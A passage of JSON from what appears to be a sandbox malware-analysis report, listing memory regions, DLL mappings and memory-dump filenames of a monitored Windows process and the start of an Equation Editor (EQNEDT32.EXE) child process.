"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 1895038976, "type": "region", "version": 1 }, "end_va": 1895469055, "entry_point": 1895038976, "filename": "\\Windows\\System32\\msvcp100.dll", "id": "region_261", "name": "msvcp100.dll", "norm_filename": "c:\\windows\\system32\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1895038976, "timestamp": "00:00:15.105", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": 
"No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 782336, "start_va": 1895497728, "type": "region", "version": 1 }, "end_va": 1896280063, "entry_point": 1895497728, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_262", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1895497728, "timestamp": "00:00:15.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1899888640, "type": "region", "version": 1 }, "end_va": 1900425215, "entry_point": 1899888640, "filename": "\\Windows\\System32\\dxgi.dll", "id": "region_263", "name": "dxgi.dll", "norm_filename": "c:\\windows\\system32\\dxgi.dll", "region_type": "memory_mapped_file", "start_va": 1899888640, "timestamp": "00:00:15.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 237568, "start_va": 1900478464, "type": "region", "version": 1 }, "end_va": 1900716031, "entry_point": 1900478464, "filename": "\\Windows\\System32\\d3d10_1core.dll", "id": "region_264", "name": "d3d10_1core.dll", "norm_filename": "c:\\windows\\system32\\d3d10_1core.dll", "region_type": "memory_mapped_file", "start_va": 1900478464, "timestamp": "00:00:15.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 180224, "start_va": 1900740608, "type": "region", "version": 1 
}, "end_va": 1900920831, "entry_point": 1900740608, "filename": "\\Windows\\System32\\d3d10_1.dll", "id": "region_265", "name": "d3d10_1.dll", "norm_filename": "c:\\windows\\system32\\d3d10_1.dll", "region_type": "memory_mapped_file", "start_va": 1900740608, "timestamp": "00:00:15.130", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1902772224, "type": "region", "version": 1 }, "end_va": 1903095807, "entry_point": 1902772224, "filename": "\\Windows\\System32\\webio.dll", "id": "region_266", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1902772224, "timestamp": "00:00:15.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1903099904, "type": "region", "version": 1 }, "end_va": 1903460351, "entry_point": 1903099904, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_267", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1903099904, "timestamp": "00:00:15.131", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1907425280, "type": "region", "version": 1 }, "end_va": 1907445759, "entry_point": 1907425280, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_268", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": 
"memory_mapped_file", "start_va": 1907425280, "timestamp": "00:00:15.132", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1937702912, "type": "region", "version": 1 }, "end_va": 1937838079, "entry_point": 1937702912, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_269", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1937702912, "timestamp": "00:00:15.132", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1940389888, "type": "region", "version": 1 }, "end_va": 1940443135, "entry_point": 1940389888, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_270", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1940389888, "timestamp": "00:00:15.133", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1940520960, "type": "region", "version": 1 }, "end_va": 1941549055, "entry_point": 1940520960, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_271", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1940520960, "timestamp": "00:00:15.134", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created 
because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1941766144, "type": "region", "version": 1 }, "end_va": 1941843967, "entry_point": 1941766144, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_272", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1941766144, "timestamp": "00:00:15.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1638400, "start_va": 1943470080, "type": "region", "version": 1 }, "end_va": 1945108479, "entry_point": 1943470080, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll", "id": "region_273", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 1943470080, "timestamp": "00:00:15.148", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1945108480, "type": "region", "version": 1 }, "end_va": 1945370623, "entry_point": 1945108480, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_274", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1945108480, "timestamp": "00:00:15.152", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ 
"readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1945370624, "type": "region", "version": 1 }, "end_va": 1946374143, "entry_point": 1945370624, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_275", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1945370624, "timestamp": "00:00:15.153", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1948377087, "entry_point": 1946681344, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_276", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:00:15.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_277", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:00:15.183", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1955659776, "type": "region", "version": 1 }, "end_va": 1955901439, "entry_point": 1955659776, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_278", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1955659776, "timestamp": "00:00:15.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958240255, "entry_point": 1958150144, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_279", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:00:15.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1962606592, "type": "region", "version": 1 }, "end_va": 1962639359, "entry_point": 1962606592, "filename": "\\Windows\\System32\\secur32.dll", "id": "region_280", "name": "secur32.dll", "norm_filename": "c:\\windows\\system32\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1962606592, "timestamp": "00:00:15.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962848255, "entry_point": 1962737664, "filename": "\\Windows\\System32\\sspicli.dll", "id": 
"region_281", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:00:15.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1962868736, "type": "region", "version": 1 }, "end_va": 1962917887, "entry_point": 1962868736, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_282", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1962868736, "timestamp": "00:00:15.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1963327488, "type": "region", "version": 1 }, "end_va": 1963495423, "entry_point": 1963327488, "filename": "\\Windows\\System32\\winsta.dll", "id": "region_283", "name": "winsta.dll", "norm_filename": "c:\\windows\\system32\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1963327488, "timestamp": "00:00:15.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1963524096, "type": "region", "version": 1 }, "end_va": 1963581439, "entry_point": 1963524096, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_284", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1963524096, "timestamp": "00:00:15.206", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1963589632, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963589632, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_285", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1963589632, "timestamp": "00:00:15.207", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000333-addr_0x0000000000700000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_9", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 7340032, "type": "region", "version": 1 }, "end_va": 7356415, "entry_point": 0, "filename": null, "id": "region_333", "name": "private_0x0000000000700000", "norm_filename": null, "region_type": "private_memory", "start_va": 7340032, "timestamp": "00:00:22.234", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000335-addr_0x0000000000730000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_10", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 7663615, "entry_point": 0, "filename": null, "id": "region_335", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:00:22.235", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000001-region_00000336-addr_0x0000000000750000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_11", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 7794687, "entry_point": 0, "filename": null, "id": "region_336", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:00:22.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000338-addr_0x0000000000ef0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_12", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 15663104, "type": "region", "version": 1 }, "end_va": 15790079, "entry_point": 0, "filename": null, "id": "region_338", "name": "private_0x0000000000ef0000", "norm_filename": null, "region_type": "private_memory", "start_va": 15663104, "timestamp": "00:00:22.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000339-addr_0x0000000000f10000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_13", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 15794176, "type": "region", "version": 1 }, "end_va": 15921151, "entry_point": 0, "filename": null, "id": "region_339", "name": "private_0x0000000000f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 15794176, "timestamp": "00:00:22.236", "type": "region", "version": 1 
}, { "dump": { "filename": "process_00000001-region_00000341-addr_0x0000000002110000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_14", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 34668544, "type": "region", "version": 1 }, "end_va": 34795519, "entry_point": 0, "filename": null, "id": "region_341", "name": "private_0x0000000002110000", "norm_filename": null, "region_type": "private_memory", "start_va": 34668544, "timestamp": "00:00:22.236", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000342-addr_0x0000000002130000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_15", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34926591, "entry_point": 0, "filename": null, "id": "region_342", "name": "private_0x0000000002130000", "norm_filename": null, "region_type": "private_memory", "start_va": 34799616, "timestamp": "00:00:22.236", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000343-addr_0x0000000002180000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_16", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 35254271, "entry_point": 0, "filename": null, "id": "region_343", "name": "private_0x0000000002180000", "norm_filename": null, "region_type": "private_memory", "start_va": 35127296, "timestamp": "00:00:22.237", 
"type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000344-addr_0x00000000021c0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_17", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 35516415, "entry_point": 0, "filename": null, "id": "region_344", "name": "private_0x00000000021c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35389440, "timestamp": "00:00:22.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000345-addr_0x00000000021e0000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_18", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 35520512, "type": "region", "version": 1 }, "end_va": 35643391, "entry_point": 0, "filename": null, "id": "region_345", "name": "private_0x00000000021e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35520512, "timestamp": "00:00:22.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000346-addr_0x0000000002270000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_19", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 36233215, "entry_point": 0, "filename": null, "id": "region_346", "name": "private_0x0000000002270000", "norm_filename": null, "region_type": "private_memory", "start_va": 36110336, 
"timestamp": "00:00:22.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000347-addr_0x0000000002670000-size_0x0000000000021000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_20", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 135168, "start_va": 40304640, "type": "region", "version": 1 }, "end_va": 40439807, "entry_point": 0, "filename": null, "id": "region_347", "name": "private_0x0000000002670000", "norm_filename": null, "region_type": "private_memory", "start_va": 40304640, "timestamp": "00:00:22.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000709-addr_0x00000000081d0000-size_0x00000000004b2000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_90", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4923392, "start_va": 136118272, "type": "region", "version": 1 }, "end_va": 141041663, "entry_point": 0, "filename": null, "id": "region_709", "name": "private_0x00000000081d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 136118272, "timestamp": "00:00:30.098", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000718-addr_0x0000000003510000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_91", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 55640064, "type": "region", "version": 1 }, "end_va": 55644159, "entry_point": 0, "filename": null, "id": "region_718", "name": "private_0x0000000003510000", "norm_filename": null, "region_type": 
"private_memory", "start_va": 55640064, "timestamp": "00:00:31.803", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000720-addr_0x0000000003570000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_92", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 56033280, "type": "region", "version": 1 }, "end_va": 56041471, "entry_point": 0, "filename": null, "id": "region_720", "name": "private_0x0000000003570000", "norm_filename": null, "region_type": "private_memory", "start_va": 56033280, "timestamp": "00:00:31.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000721-addr_0x0000000003580000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_93", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 56098816, "type": "region", "version": 1 }, "end_va": 56102911, "entry_point": 0, "filename": null, "id": "region_721", "name": "private_0x0000000003580000", "norm_filename": null, "region_type": "private_memory", "start_va": 56098816, "timestamp": "00:00:31.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000722-addr_0x0000000003590000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_94", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 56164352, "type": "region", "version": 1 }, "end_va": 56172543, "entry_point": 0, "filename": null, "id": "region_722", "name": "private_0x0000000003590000", 
"norm_filename": null, "region_type": "private_memory", "start_va": 56164352, "timestamp": "00:00:31.804", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000724-addr_0x00000000035b0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_95", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 56295424, "type": "region", "version": 1 }, "end_va": 56303615, "entry_point": 0, "filename": null, "id": "region_724", "name": "private_0x00000000035b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56295424, "timestamp": "00:00:31.805", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000726-addr_0x00000000036e0000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_96", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 57540608, "type": "region", "version": 1 }, "end_va": 57548799, "entry_point": 0, "filename": null, "id": "region_726", "name": "private_0x00000000036e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57540608, "timestamp": "00:00:31.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000728-addr_0x0000000003700000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_97", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 57671680, "type": "region", "version": 1 }, "end_va": 57679871, "entry_point": 0, "filename": null, "id": "region_728", "name": 
"private_0x0000000003700000", "norm_filename": null, "region_type": "private_memory", "start_va": 57671680, "timestamp": "00:00:31.806", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000735-addr_0x0000000000730000-size_0x0000000000031000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_98", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 200704, "start_va": 7536640, "type": "region", "version": 1 }, "end_va": 7737343, "entry_point": 0, "filename": null, "id": "region_735", "name": "private_0x0000000000730000", "norm_filename": null, "region_type": "private_memory", "start_va": 7536640, "timestamp": "00:00:33.689", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000741-addr_0x0000000007230000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_99", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 119734272, "type": "region", "version": 1 }, "end_va": 120782847, "entry_point": 0, "filename": null, "id": "region_741", "name": "private_0x0000000007230000", "norm_filename": null, "region_type": "private_memory", "start_va": 119734272, "timestamp": "00:00:33.691", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000745-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_100", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": 
null, "id": "region_745", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:33.693", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000759-addr_0x0000000007490000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_101", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 122224640, "type": "region", "version": 1 }, "end_va": 123273215, "entry_point": 0, "filename": null, "id": "region_759", "name": "private_0x0000000007490000", "norm_filename": null, "region_type": "private_memory", "start_va": 122224640, "timestamp": "00:00:39.843", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000760-addr_0x0000000009460000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_102", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 155582464, "type": "region", "version": 1 }, "end_va": 155647999, "entry_point": 0, "filename": null, "id": "region_760", "name": "private_0x0000000009460000", "norm_filename": null, "region_type": "private_memory", "start_va": 155582464, "timestamp": "00:00:39.843", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding", "filename": "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe", "id": "proc_2", 
"image_name": "eqnedt32.exe", "monitor_reason": "rpc_server", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000352-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_21", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_352", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000353-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_22", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_353", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:22.539", "type": "region", "version": 1 }, { 